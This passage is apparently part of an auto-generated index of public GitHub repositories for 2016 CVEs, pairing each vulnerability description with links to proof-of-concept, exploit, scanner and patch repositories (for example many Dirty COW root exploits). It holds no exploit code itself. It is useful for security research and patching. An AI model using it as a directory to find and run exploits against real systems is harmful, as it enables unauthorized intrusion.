- [hansnielsen/tiffdisabler](https://github.com/hansnielsen/tiffdisabler)
### CVE-2016-4655 (2016-08-25)
The kernel in Apple iOS before 9.3.5 allows attackers to obtain sensitive information from memory via a crafted app.
- [jndok/PegasusX](https://github.com/jndok/PegasusX)
- [Cryptiiiic/skybreak](https://github.com/Cryptiiiic/skybreak)
- [liangle1986126z/jndok](https://github.com/liangle1986126z/jndok)
### CVE-2016-4657 (2016-08-25)
WebKit in Apple iOS before 9.3.5 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.
- [Mimoja/CVE-2016-4657-NintendoSwitch](https://github.com/Mimoja/CVE-2016-4657-NintendoSwitch)
- [iDaN5x/Switcheroo](https://github.com/iDaN5x/Switcheroo)
- [viai957/webkit-vulnerability](https://github.com/viai957/webkit-vulnerability)
### CVE-2016-4669 (2017-02-20)
An issue was discovered in certain Apple products. iOS before 10.1 is affected. macOS before 10.12.1 is affected. tvOS before 10.0.1 is affected. watchOS before 3.1 is affected. The issue involves the "Kernel" component. It allows local users to execute arbitrary code in a privileged context or cause a denial of service (MIG code mishandling and system crash) via unspecified vectors.
- [i-o-s/CVE-2016-4669](https://github.com/i-o-s/CVE-2016-4669)
### CVE-2016-4845 (2016-09-24)
Cross-site request forgery (CSRF) vulnerability on I-O DATA DEVICE HVL-A2.0, HVL-A3.0, HVL-A4.0, HVL-AT1.0S, HVL-AT2.0, HVL-AT3.0, HVL-AT4.0, HVL-AT2.0A, HVL-AT3.0A, and HVL-AT4.0A devices with firmware before 2.04 allows remote attackers to hijack the authentication of arbitrary users for requests that delete content.
- [kaito834/cve-2016-4845_csrf](https://github.com/kaito834/cve-2016-4845_csrf)
### CVE-2016-4861 (2017-02-16)
The (1) order and (2) group methods in Zend_Db_Select in the Zend Framework before 1.12.20 might allow remote attackers to conduct SQL injection attacks by leveraging failure to remove comments from an SQL statement before validation.
- [KosukeShimofuji/CVE-2016-4861](https://github.com/KosukeShimofuji/CVE-2016-4861)
### CVE-2016-4971 (2016-06-30)
GNU wget before 1.18 allows remote servers to write to arbitrary files by redirecting a request from HTTP to a crafted FTP resource.
- [gitcollect/CVE-2016-4971](https://github.com/gitcollect/CVE-2016-4971)
- [mbadanoiu/CVE-2016-4971](https://github.com/mbadanoiu/CVE-2016-4971)
- [dinidhu96/IT19013756_-CVE-2016-4971-](https://github.com/dinidhu96/IT19013756_-CVE-2016-4971-)
### CVE-2016-4977 (2017-05-25)
When processing authorization requests using the whitelabel views in Spring Security OAuth 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote code execution via the crafting of the value for response_type.
- [N0b1e6/CVE-2016-4977-POC](https://github.com/N0b1e6/CVE-2016-4977-POC)
- [tpt11fb/SpringVulScan](https://github.com/tpt11fb/SpringVulScan)
### CVE-2016-4999 (2016-08-05)
SQL injection vulnerability in the getStringParameterSQL method in main/java/org/dashbuilder/dataprovider/sql/dialect/DefaultDialect.java in Dashbuilder before 0.6.0.Beta1 allows remote attackers to execute arbitrary SQL commands via a data set lookup filter in the (1) Data Set Authoring or (2) Displayer editor UI.
- [shanika04/dashbuilder](https://github.com/shanika04/dashbuilder)
### CVE-2016-5195 (2016-11-10)
Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka "Dirty COW."
- [KosukeShimofuji/CVE-2016-5195](https://github.com/KosukeShimofuji/CVE-2016-5195)
- [ASRTeam/CVE-2016-5195](https://github.com/ASRTeam/CVE-2016-5195)
- [timwr/CVE-2016-5195](https://github.com/timwr/CVE-2016-5195)
- [xlucas/dirtycow.cr](https://github.com/xlucas/dirtycow.cr)
- [istenrot/centos-dirty-cow-ansible](https://github.com/istenrot/centos-dirty-cow-ansible)
- [pgporada/ansible-role-cve](https://github.com/pgporada/ansible-role-cve)
- [sideeffect42/DirtyCOWTester](https://github.com/sideeffect42/DirtyCOWTester)
- [scumjr/dirtycow-vdso](https://github.com/scumjr/dirtycow-vdso)
- [gbonacini/CVE-2016-5195](https://github.com/gbonacini/CVE-2016-5195)
- [DavidBuchanan314/cowroot](https://github.com/DavidBuchanan314/cowroot)
- [aishee/scan-dirtycow](https://github.com/aishee/scan-dirtycow)
- [oleg-fiksel/ansible_CVE-2016-5195_check](https://github.com/oleg-fiksel/ansible_CVE-2016-5195_check)
- [ldenevi/CVE-2016-5195](https://github.com/ldenevi/CVE-2016-5195)
- [whu-enjoy/CVE-2016-5195](https://github.com/whu-enjoy/CVE-2016-5195)
- [firefart/dirtycow](https://github.com/firefart/dirtycow)
- [ndobson/inspec_CVE-2016-5195](https://github.com/ndobson/inspec_CVE-2016-5195)
- [sribaba/android-CVE-2016-5195](https://github.com/sribaba/android-CVE-2016-5195)
- [esc0rtd3w/org.cowpoop.moooooo](https://github.com/esc0rtd3w/org.cowpoop.moooooo)
- [hyln9/VIKIROOT](https://github.com/hyln9/VIKIROOT)
- [droidvoider/dirtycow-replacer](https://github.com/droidvoider/dirtycow-replacer)
- [FloridSleeves/os-experiment-4](https://github.com/FloridSleeves/os-experiment-4)
- [arbll/dirtycow](https://github.com/arbll/dirtycow)
- [titanhp/Dirty-COW-CVE-2016-5195-Testing](https://github.com/titanhp/Dirty-COW-CVE-2016-5195-Testing)
- [acidburnmi/CVE-2016-5195-master](https://github.com/acidburnmi/CVE-2016-5195-master)
- [xpcmdshell/derpyc0w](https://github.com/xpcmdshell/derpyc0w)
- [Brucetg/DirtyCow-EXP](https://github.com/Brucetg/DirtyCow-EXP)
- [jas502n/CVE-2016-5195](https://github.com/jas502n/CVE-2016-5195)
- [imust6226/dirtcow](https://github.com/imust6226/dirtcow)
- [zakariamaaraki/Dirty-COW-CVE-2016-5195-](https://github.com/zakariamaaraki/Dirty-COW-CVE-2016-5195-)
- [shanuka-ashen/Dirty-Cow-Explanation-CVE-2016-5195-](https://github.com/shanuka-ashen/Dirty-Cow-Explanation-CVE-2016-5195-)
- [dulanjaya23/Dirty-Cow-CVE-2016-5195-](https://github.com/dulanjaya23/Dirty-Cow-CVE-2016-5195-)
- [KaviDk/dirtyCow](https://github.com/KaviDk/dirtyCow)
- [DanielEbert/CVE-2016-5195](https://github.com/DanielEbert/CVE-2016-5195)
- [arttnba3/CVE-2016-5195](https://github.com/arttnba3/CVE-2016-5195)
- [talsim/root-dirtyc0w](https://github.com/talsim/root-dirtyc0w)
- [KasunPriyashan/Y2S1-Project-Linux-Exploitaion-using-CVE-2016-5195-Vulnerability](https://github.com/KasunPriyashan/Y2S1-Project-Linux-Exploitaion-using-CVE-2016-5195-Vulnerability)
- [th3-5had0w/DirtyCOW-PoC](https://github.com/th3-5had0w/DirtyCOW-PoC)
- [r1is/CVE-2022-0847](https://github.com/r1is/CVE-2022-0847)
- [vinspiert/scumjrs](https://github.com/vinspiert/scumjrs)
- [gurpreetsinghsaluja/dirtycow](https://github.com/gurpreetsinghsaluja/dirtycow)
- [TotallyNotAHaxxer/CVE-2016-5195](https://github.com/TotallyNotAHaxxer/CVE-2016-5195)
- [passionchenjianyegmail8/scumjrs](https://github.com/passionchenjianyegmail8/scumjrs)
- [malinthag62/The-exploitation-of-Dirty-Cow-CVE-2016-5195](https://github.com/malinthag62/The-exploitation-of-Dirty-Cow-CVE-2016-5195)
- [1equeneRise/scumjr9](https://github.com/1equeneRise/scumjr9)
- [fei9747/CVE-2016-5195](https://github.com/fei9747/CVE-2016-5195)
- [LinuxKernelContent/DirtyCow](https://github.com/LinuxKernelContent/DirtyCow)
- [NguyenCongHaiNam/Research-CVE-2016-5195](https://github.com/NguyenCongHaiNam/Research-CVE-2016-5195)
- [EDLLT/CVE-2016-5195-master](https://github.com/EDLLT/CVE-2016-5195-master)
- [ZhiQiAnSecFork/DirtyCOW_CVE-2016-5195](https://github.com/ZhiQiAnSecFork/DirtyCOW_CVE-2016-5195)
- [sakilahamed/Linux-Kernel-Exploit-LAB](https://github.com/sakilahamed/Linux-Kernel-Exploit-LAB)
- [ASUKA39/CVE-2016-5195](https://github.com/ASUKA39/CVE-2016-5195)
### CVE-2016-5345 (2018-01-23)
Buffer overflow in the Qualcomm radio driver in Android before 2017-01-05 on Android One devices allows local users to gain privileges via a crafted application, aka Android internal bug 32639452 and Qualcomm internal bug CR1079713.
- [NickStephens/cve-2016-5345](https://github.com/NickStephens/cve-2016-5345)
### CVE-2016-5394 (2017-07-19)
In the XSS Protection API module before 1.0.12 in Apache Sling, the encoding done by the XSSAPI.encodeForJSString() method is not restrictive enough and for some input patterns allows script tags to pass through unencoded, leading to potential XSS vulnerabilities.
- [epicosy/VUL4J-23](https://github.com/epicosy/VUL4J-23)
### CVE-2016-5636 (2016-09-02)
Integer overflow in the get_data function in zipimport.c in CPython (aka Python) before 2.7.12, 3.x before 3.4.5, and 3.5.x before 3.5.2 allows remote attackers to have unspecified impact via a negative data size value, which triggers a heap-based buffer overflow.
- [insuyun/CVE-2016-5636](https://github.com/insuyun/CVE-2016-5636)
### CVE-2016-5639 (2016-08-03)
Directory traversal vulnerability in cgi-bin/login.cgi on Crestron AirMedia AM-100 devices with firmware before 1.4.0.13 allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter.
- [xfox64x/CVE-2016-5639](https://github.com/xfox64x/CVE-2016-5639)
### CVE-2016-5640 (2016-08-03)
Directory traversal vulnerability in cgi-bin/rftest.cgi on Crestron AirMedia AM-100 devices with firmware before 1.4.0.13 allows remote attackers to execute arbitrary commands via a .. (dot dot) in the ATE_COMMAND parameter.
- [vpnguy-zz/CrestCrack](https://github.com/vpnguy-zz/CrestCrack)
- [xfox64x/CVE-2016-5640](https://github.com/xfox64x/CVE-2016-5640)
### CVE-2016-5696 (2016-08-06)
net/ipv4/tcp_input.c in the Linux kernel before 4.7 does not properly determine the rate of challenge ACK segments, which makes it easier for remote attackers to hijack TCP sessions via a blind in-window attack.
- [Gnoxter/mountain_goat](https://github.com/Gnoxter/mountain_goat)
- [violentshell/rover](https://github.com/violentshell/rover)
- [jduck/challack](https://github.com/jduck/challack)
- [bplinux/chackd](https://github.com/bplinux/chackd)
- [unkaktus/grill](https://github.com/unkaktus/grill)
### CVE-2016-5699 (2016-09-02)
CRLF injection vulnerability in the HTTPConnection.putheader function in urllib2 and urllib in CPython (aka Python) before 2.7.10 and 3.x before 3.4.4 allows remote attackers to inject arbitrary HTTP headers via CRLF sequences in a URL.
- [bunseokbot/CVE-2016-5699-poc](https://github.com/bunseokbot/CVE-2016-5699-poc)
- [shajinzheng/cve-2016-5699-jinzheng-sha](https://github.com/shajinzheng/cve-2016-5699-jinzheng-sha)
### CVE-2016-5734 (2016-07-03)
phpMyAdmin 4.0.x before 4.0.10.16, 4.4.x before 4.4.15.7, and 4.6.x before 4.6.3 does not properly choose delimiters to prevent use of the preg_replace e (aka eval) modifier, which might allow remote attackers to execute arbitrary PHP code via a crafted string, as demonstrated by the table search-and-replace implementation.
- [KosukeShimofuji/CVE-2016-5734](https://github.com/KosukeShimofuji/CVE-2016-5734)
- [HKirito/phpmyadmin4.4_cve-2016-5734](https://github.com/HKirito/phpmyadmin4.4_cve-2016-5734)
- [miko550/CVE-2016-5734-docker](https://github.com/miko550/CVE-2016-5734-docker)
### CVE-2016-5983 (2016-10-05)
IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.43, 8.0 before 8.0.0.13, 8.5 before 8.5.5.11, 9.0 before 9.0.0.2, and Liberty before 16.0.0.4 allows remote authenticated users to execute arbitrary Java code via a crafted serialized object.
- [BitWrecker/CVE-2016-5983](https://github.com/BitWrecker/CVE-2016-5983)
### CVE-2016-6187 (2016-08-06)
The apparmor_setprocattr function in security/apparmor/lsm.c in the Linux kernel before 4.6.5 does not validate the buffer size, which allows local users to gain privileges by triggering an AppArmor setprocattr hook.
- [vnik5287/cve-2016-6187-poc](https://github.com/vnik5287/cve-2016-6187-poc)
- [Milo-D/CVE-2016-6187_LPE](https://github.com/Milo-D/CVE-2016-6187_LPE)
### CVE-2016-6210 (2017-02-13)
sshd in OpenSSH before 7.3, when SHA256 or SHA512 are used for user password hashing, uses BLOWFISH hashing on a static password when the username does not exist, which allows remote attackers to enumerate users by leveraging the timing difference between responses when a large password is provided.
- [justlce/CVE-2016-6210-Exploit](https://github.com/justlce/CVE-2016-6210-Exploit)
- [goomdan/CVE-2016-6210-exploit](https://github.com/goomdan/CVE-2016-6210-exploit)
- [samh4cks/CVE-2016-6210-OpenSSH-User-Enumeration](https://github.com/samh4cks/CVE-2016-6210-OpenSSH-User-Enumeration)
### CVE-2016-6271 (2017-01-18)
The Bzrtp library (aka libbzrtp) 1.0.x before 1.0.4 allows man-in-the-middle attackers to conduct spoofing attacks by leveraging a missing HVI check on DHPart2 packet reception.
- [gteissier/CVE-2016-6271](https://github.com/gteissier/CVE-2016-6271)
### CVE-2016-6317 (2016-09-07)
Action Record in Ruby on Rails 4.2.x before 4.2.7.1 does not properly consider differences in parameter handling between the Active Record component and the JSON implementation, which allows remote attackers to bypass intended database-query restrictions and perform NULL checks or trigger missing WHERE clauses via a crafted request, as demonstrated by certain "[nil]" values, a related issue to CVE-2012-2660, CVE-2012-2694, and CVE-2013-0155.
- [kavgan/vuln_test_repo_public_ruby_gemfile_cve-2016-6317](https://github.com/kavgan/vuln_test_repo_public_ruby_gemfile_cve-2016-6317)
### CVE-2016-6366 (2016-08-18)
Buffer overflow in Cisco Adaptive Security Appliance (ASA) Software through 9.4.2.3 on ASA 5500, ASA 5500-X, ASA Services Module, ASA 1000V, ASAv, Firepower 9300 ASA Security Module, PIX, and FWSM devices allows remote authenticated users to execute arbitrary code via crafted IPv4 SNMP packets, aka Bug ID CSCva92151 or EXTRABACON.
- [RiskSense-Ops/CVE-2016-6366](https://github.com/RiskSense-Ops/CVE-2016-6366)
### CVE-2016-6415 (2016-09-19)
The server IKEv1 implementation in Cisco IOS 12.2 through 12.4 and 15.0 through 15.6, IOS XE through 3.18S, IOS XR 4.3.x and 5.0.x through 5.2.x, and PIX before 7.0 allows remote attackers to obtain sensitive information from device memory via a Security Association (SA) negotiation request, aka Bug IDs CSCvb29204 and CSCvb36055 or BENIGNCERTAIN.
- [3ndG4me/CVE-2016-6415-BenignCertain-Monitor](https://github.com/3ndG4me/CVE-2016-6415-BenignCertain-Monitor)
### CVE-2016-6515 (2016-08-07)
The auth_password function in auth-passwd.c in sshd in OpenSSH before 7.3 does not limit password lengths for password authentication, which allows remote attackers to cause a denial of service (crypt CPU consumption) via a long string.
- [opsxcq/exploit-CVE-2016-6515](https://github.com/opsxcq/exploit-CVE-2016-6515)
- [cved-sources/cve-2016-6515](https://github.com/cved-sources/cve-2016-6515)
- [jptr218/openssh_dos](https://github.com/jptr218/openssh_dos)
### CVE-2016-6516 (2016-08-06)
Race condition in the ioctl_file_dedupe_range function in fs/ioctl.c in the Linux kernel through 4.7 allows local users to cause a denial of service (heap-based buffer overflow) or possibly gain privileges by changing a certain count value, aka a "double fetch" vulnerability.
- [wpengfei/CVE-2016-6516-exploit](https://github.com/wpengfei/CVE-2016-6516-exploit)
### CVE-2016-6584
- [ViralSecurityGroup/KNOXout](https://github.com/ViralSecurityGroup/KNOXout)
### CVE-2016-6662 (2016-09-20)
Oracle MySQL through 5.5.52, 5.6.x through 5.6.33, and 5.7.x through 5.7.15; MariaDB before 5.5.51, 10.0.x before 10.0.27, and 10.1.x before 10.1.17; and Percona Server before 5.5.51-38.1, 5.6.x before 5.6.32-78.0, and 5.7.x before 5.7.14-7 allow local users to create arbitrary configurations and bypass certain protection mechanisms by setting general_log_file to a my.cnf configuration. NOTE: this can be leveraged to execute arbitrary code with root privileges by setting malloc_lib. NOTE: the affected MySQL version information is from Oracle's October 2016 CPU. Oracle has not commented on third-party claims that the issue was silently patched in MySQL 5.5.52, 5.6.33, and 5.7.15.
- [konstantin-kelemen/mysqld_safe-CVE-2016-6662-patch](https://github.com/konstantin-kelemen/mysqld_safe-CVE-2016-6662-patch)
- [meersjo/ansible-mysql-cve-2016-6662](https://github.com/meersjo/ansible-mysql-cve-2016-6662)
- [KosukeShimofuji/CVE-2016-6662](https://github.com/KosukeShimofuji/CVE-2016-6662)
- [Ashrafdev/MySQL-Remote-Root-Code-Execution](https://github.com/Ashrafdev/MySQL-Remote-Root-Code-Execution)
- [boompig/cve-2016-6662](https://github.com/boompig/cve-2016-6662)
- [MAYASEVEN/CVE-2016-6662](https://github.com/MAYASEVEN/CVE-2016-6662)
### CVE-2016-6663 (2016-12-13)
Race condition in Oracle MySQL before 5.5.52, 5.6.x before 5.6.33, 5.7.x before 5.7.15, and 8.x before 8.0.1; MariaDB before 5.5.52, 10.0.x before 10.0.28, and 10.1.x before 10.1.18; Percona Server before 5.5.51-38.2, 5.6.x before 5.6.32-78-1, and 5.7.x before 5.7.14-8; and Percona XtraDB Cluster before 5.5.41-37.0, 5.6.x before 5.6.32-25.17, and 5.7.x before 5.7.14-26.17 allows local users with certain permissions to gain privileges by leveraging use of my_copystat by REPAIR TABLE to repair a MyISAM table.
- [firebroo/CVE-2016-6663](https://github.com/firebroo/CVE-2016-6663)
### CVE-2016-6754 (2016-11-25)
A remote code execution vulnerability in Webview in Android 5.0.x before 5.0.2, 5.1.x before 5.1.1, and 6.x before 2016-11-05 could enable a remote attacker to execute arbitrary code when the user is navigating to a website. This issue is rated as High due to the possibility of remote code execution in an unprivileged process. Android ID: A-31217937.
- [secmob/BadKernel](https://github.com/secmob/BadKernel)
### CVE-2016-6798 (2017-07-19)
In the XSS Protection API module before 1.0.12 in Apache Sling, the method XSS.getValidXML() uses an insecure SAX parser to validate the input string, which allows for XXE attacks in all scripts which use this method to validate user input, potentially allowing an attacker to read sensitive data on the filesystem, perform same-site-request-forgery (SSRF), port-scanning behind the firewall or DoS the application.
- [tafamace/CVE-2016-6798](https://github.com/tafamace/CVE-2016-6798)
### CVE-2016-6801 (2016-09-21)
Cross-site request forgery (CSRF) vulnerability in the CSRF content-type check in Jackrabbit-Webdav in Apache Jackrabbit 2.4.x before 2.4.6, 2.6.x before 2.6.6, 2.8.x before 2.8.3, 2.10.x before 2.10.4, 2.12.x before 2.12.4, and 2.13.x before 2.13.3 allows remote attackers to hijack the authentication of unspecified victims for requests that create a resource via an HTTP POST request with a (1) missing or (2) crafted Content-Type header.
- [TSNGL21/CVE-2016-6801](https://github.com/TSNGL21/CVE-2016-6801)
### CVE-2016-7117 (2016-10-10)
Use-after-free vulnerability in the __sys_recvmmsg function in net/socket.c in the Linux kernel before 4.5.2 allows remote attackers to execute arbitrary code via vectors involving a recvmmsg system call that is mishandled during error processing.
- [KosukeShimofuji/CVE-2016-7117](https://github.com/KosukeShimofuji/CVE-2016-7117)
### CVE-2016-7190 (2016-10-14)
The Chakra JavaScript engine in Microsoft Edge allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Scripting Engine Memory Corruption Vulnerability," a different vulnerability than CVE-2016-3386, CVE-2016-3389, and CVE-2016-7194.
- [0xcl/cve-2016-7190](https://github.com/0xcl/cve-2016-7190)
### CVE-2016-7200 (2016-11-10)
The Chakra JavaScript scripting engine in Microsoft Edge allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Scripting Engine Memory Corruption Vulnerability," a different vulnerability than CVE-2016-7201, CVE-2016-7202, CVE-2016-7203, CVE-2016-7208, CVE-2016-7240, CVE-2016-7242, and CVE-2016-7243.
- [theori-io/chakra-2016-11](https://github.com/theori-io/chakra-2016-11)
### CVE-2016-7255 (2016-11-10)
The kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, and 1607, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability."
- [heh3/CVE-2016-7255](https://github.com/heh3/CVE-2016-7255)
- [FSecureLABS/CVE-2016-7255](https://github.com/FSecureLABS/CVE-2016-7255)
- [homjxi0e/CVE-2016-7255](https://github.com/homjxi0e/CVE-2016-7255)
- [yuvatia/page-table-exploitation](https://github.com/yuvatia/page-table-exploitation)
- [bbolmin/cve-2016-7255_x86_x64](https://github.com/bbolmin/cve-2016-7255_x86_x64)
### CVE-2016-7434 (2017-01-13)
The read_mru_list function in NTP before 4.2.8p9 allows remote attackers to cause a denial of service (crash) via a crafted mrulist query.
- [opsxcq/exploit-CVE-2016-7434](https://github.com/opsxcq/exploit-CVE-2016-7434)
- [shekkbuilder/CVE-2016-7434](https://github.com/shekkbuilder/CVE-2016-7434)
- [cved-sources/cve-2016-7434](https://github.com/cved-sources/cve-2016-7434)
### CVE-2016-7608 (2017-02-20)
An issue was discovered in certain Apple products. macOS before 10.12.2 is affected. The issue involves the "IOFireWireFamily" component, which allows local users to obtain sensitive information from kernel memory via unspecified vectors.
- [bazad/IOFireWireFamily-overflow](https://github.com/bazad/IOFireWireFamily-overflow)
### CVE-2016-7855 (2016-11-01)
Use-after-free vulnerability in Adobe Flash Player before 23.0.0.205 on Windows and OS X and before 11.2.202.643 on Linux allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in October 2016.
- [swagatbora90/CheckFlashPlayerVersion](https://github.com/swagatbora90/CheckFlashPlayerVersion)
### CVE-2016-8007 (2017-03-14)
Authentication bypass vulnerability in McAfee Host Intrusion Prevention Services (HIPS) 8.0 Patch 7 and earlier allows authenticated users to manipulate the product's registry keys via specific conditions.
- [dmaasland/mcafee-hip-CVE-2016-8007](https://github.com/dmaasland/mcafee-hip-CVE-2016-8007)
### CVE-2016-8016 (2017-03-14)
Information exposure in Intel Security VirusScan Enterprise Linux (VSEL) 2.0.3 (and earlier) allows authenticated remote attackers to obtain the existence of unauthorized files on the system via a URL parameter.
- [opsxcq/exploit-CVE-2016-8016-25](https://github.com/opsxcq/exploit-CVE-2016-8016-25)
### CVE-2016-8367 (2017-02-13)
An issue was discovered in Schneider Electric Magelis HMI Magelis GTO Advanced Optimum Panels, all versions, Magelis GTU Universal Panel, all versions, Magelis STO5xx and STU Small panels, all versions, Magelis XBT GH Advanced Hand-held Panels, all versions, Magelis XBT GK Advanced Touchscreen Panels with Keyboard, all versions, Magelis XBT GT Advanced Touchscreen Panels, all versions, and Magelis XBT GTW Advanced Open Touchscreen Panels (Windows XPe). An attacker can open multiple connections to a targeted web server and keep connections open preventing new connections from being made, rendering the web server unavailable during an attack.
- [0xICF/PanelShock](https://github.com/0xICF/PanelShock)
### CVE-2016-8462 (2017-01-12)
An information disclosure vulnerability in the bootloader could enable a local attacker to access data outside of its permission level. This issue is rated as High because it could be used to access sensitive data. Product: Android. Versions: N/A. Android ID: A-32510383.
- [CunningLogic/PixelDump_CVE-2016-8462](https://github.com/CunningLogic/PixelDump_CVE-2016-8462)
### CVE-2016-8467 (2017-01-13)
An elevation of privilege vulnerability in the bootloader could enable a local attacker to execute arbitrary modem commands on the device. This issue is rated as High because it is a local permanent denial of service (device interoperability: completely permanent or requiring re-flashing the entire operating system). Product: Android. Versions: N/A. Android ID: A-30308784.
- [roeeh/bootmodechecker](https://github.com/roeeh/bootmodechecker)
### CVE-2016-8610 (2017-11-13)
A denial of service flaw was found in OpenSSL 0.9.8, 1.0.1, 1.0.2 through 1.0.2h, and 1.1.0 in the way the TLS/SSL protocol defined processing of ALERT packets during a connection handshake. A remote attacker could use this flaw to make a TLS/SSL server consume an excessive amount of CPU and fail to accept connections from other clients.
- [cujanovic/CVE-2016-8610-PoC](https://github.com/cujanovic/CVE-2016-8610-PoC)
### CVE-2016-8636 (2017-02-22)
Integer overflow in the mem_check_range function in drivers/infiniband/sw/rxe/rxe_mr.c in the Linux kernel before 4.9.10 allows local users to cause a denial of service (memory corruption), obtain sensitive information from kernel memory, or possibly have unspecified other impact via a write or read request involving the "RDMA protocol over infiniband" (aka Soft RoCE) technology.
- [jigerjain/Integer-Overflow-test](https://github.com/jigerjain/Integer-Overflow-test)
### CVE-2016-8655 (2016-12-08)
Race condition in net/packet/af_packet.c in the Linux kernel through 4.8.12 allows local users to gain privileges or cause a denial of service (use-after-free) by leveraging the CAP_NET_RAW capability to change a socket version, related to the packet_set_ring and packet_setsockopt functions.
- [scarvell/cve-2016-8655](https://github.com/scarvell/cve-2016-8655)
- [LakshmiDesai/CVE-2016-8655](https://github.com/LakshmiDesai/CVE-2016-8655)
- [KosukeShimofuji/CVE-2016-8655](https://github.com/KosukeShimofuji/CVE-2016-8655)
- [agkunkle/chocobo](https://github.com/agkunkle/chocobo)
- [martinmullins/CVE-2016-8655_Android](https://github.com/martinmullins/CVE-2016-8655_Android)
### CVE-2016-8735 (2017-04-06)
Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x before 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12 if JmxRemoteLifecycleListener is used and an attacker can reach JMX ports. The issue exists because this listener wasn't updated for consistency with the CVE-2016-3427 Oracle patch that affected credential types.
- [ianxtianxt/CVE-2016-8735](https://github.com/ianxtianxt/CVE-2016-8735)
### CVE-2016-8740 (2016-12-05)
The mod_http2 module in the Apache HTTP Server 2.4.17 through 2.4.23, when the Protocols configuration includes h2 or h2c, does not restrict request-header length, which allows remote attackers to cause a denial of service (memory consumption) via crafted CONTINUATION frames in an HTTP/2 request.
- [lcfpadilha/mac0352-ep4](https://github.com/lcfpadilha/mac0352-ep4)
- [jptr218/apachedos](https://github.com/jptr218/apachedos)
### CVE-2016-8776 (2017-04-02)
Huawei P9 phones with software EVA-AL10C00,EVA-CL10C00,EVA-DL10C00,EVA-TL10C00 and P9 Lite phones with software VNS-L21C185 allow attackers to bypass the factory reset protection (FRP) to enter some functional modules without authorization and perform operations to update the Google account.
- [akzedevops/CVE-2016-8776](https://github.com/akzedevops/CVE-2016-8776)
### CVE-2016-8823 (2016-12-16)
All versions of NVIDIA Windows GPU Display Driver contain a vulnerability in the kernel mode layer handler for DxgDdiEscape where the size of an input buffer is not validated leading to a denial of service or possible escalation of privileges
- [SpiralBL0CK/NDAY_CVE_2016_8823](https://github.com/SpiralBL0CK/NDAY_CVE_2016_8823)
### CVE-2016-8858 (2016-12-09)
The kex_input_kexinit function in kex.c in OpenSSH 6.x and 7.x through 7.3 allows remote attackers to cause a denial of service (memory consumption) by sending many duplicate KEXINIT requests. NOTE: a third party reports that "OpenSSH upstream does not consider this as a security issue."
- [dag-erling/kexkill](https://github.com/dag-erling/kexkill)
### CVE-2016-8863 (2017-03-07)
Heap-based buffer overflow in the create_url_list function in gena/gena_device.c in Portable UPnP SDK (aka libupnp) before 1.6.21 allows remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a valid URI followed by an invalid one in the CALLBACK header of an SUBSCRIBE request.
- [mephi42/CVE-2016-8863](https://github.com/mephi42/CVE-2016-8863)
### CVE-2016-8869 (2016-11-04)
The register method in the UsersModelRegistration class in controllers/user.php in the Users component in Joomla! before 3.6.4 allows remote attackers to gain privileges by leveraging incorrect use of unfiltered data when registering on a site.
- [zugetor/Joomla-3.4.4-3.6.4_CVE-2016-8869_and_CVE-2016-8870](https://github.com/zugetor/Joomla-3.4.4-3.6.4_CVE-2016-8869_and_CVE-2016-8870)
- [rustyJ4ck/JoomlaCVE20168869](https://github.com/rustyJ4ck/JoomlaCVE20168869)
- [cved-sources/cve-2016-8869](https://github.com/cved-sources/cve-2016-8869)
### CVE-2016-8870 (2016-11-04)
The register method in the UsersModelRegistration class in controllers/user.php in the Users component in Joomla! before 3.6.4, when registration has been disabled, allows remote attackers to create user accounts by leveraging failure to check the Allow User Registration configuration setting.
- [cved-sources/cve-2016-8870](https://github.com/cved-sources/cve-2016-8870)
### CVE-2016-9066 (2018-06-11)
A buffer overflow resulting in a potentially exploitable crash due to memory allocation issues when handling large amounts of incoming data. This vulnerability affects Thunderbird < 45.5, Firefox ESR < 45.5, and Firefox < 50.
- [saelo/foxpwn](https://github.com/saelo/foxpwn)
### CVE-2016-9079 (2018-06-11)
A use-after-free vulnerability in SVG Animation has been discovered. An exploit built on this vulnerability has been discovered in the wild targeting Firefox and Tor Browser users on Windows. This vulnerability affects Firefox < 50.0.2, Firefox ESR < 45.5.1, and Thunderbird < 45.5.1.
- [LakshmiDesai/CVE-2016-9079](https://github.com/LakshmiDesai/CVE-2016-9079)
- [dangokyo/CVE-2016-9079](https://github.com/dangokyo/CVE-2016-9079)
- [Tau-hub/Firefox-CVE-2016-9079](https://github.com/Tau-hub/Firefox-CVE-2016-9079)
### CVE-2016-9192 (2016-12-14)
A vulnerability in Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to install and execute an arbitrary executable file with privileges equivalent to the Microsoft Windows operating system SYSTEM account. More Information: CSCvb68043. Known Affected Releases: 4.3(2039) 4.3(748). Known Fixed Releases: 4.3(4019) 4.4(225).
- [serializingme/cve-2016-9192](https://github.com/serializingme/cve-2016-9192)
### CVE-2016-9244 (2017-02-09)
A BIG-IP virtual server configured with a Client SSL profile that has the non-default Session Tickets option enabled may leak up to 31 bytes of uninitialized memory. A remote attacker may exploit this vulnerability to obtain Secure Sockets Layer (SSL) session IDs from other sessions. It is possible that other data from uninitialized memory may be returned as well.
- [EgeBalci/Ticketbleed](https://github.com/EgeBalci/Ticketbleed)
- [glestel/minion-ticket-bleed-plugin](https://github.com/glestel/minion-ticket-bleed-plugin)
### CVE-2016-9299 (2017-01-12)
The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.
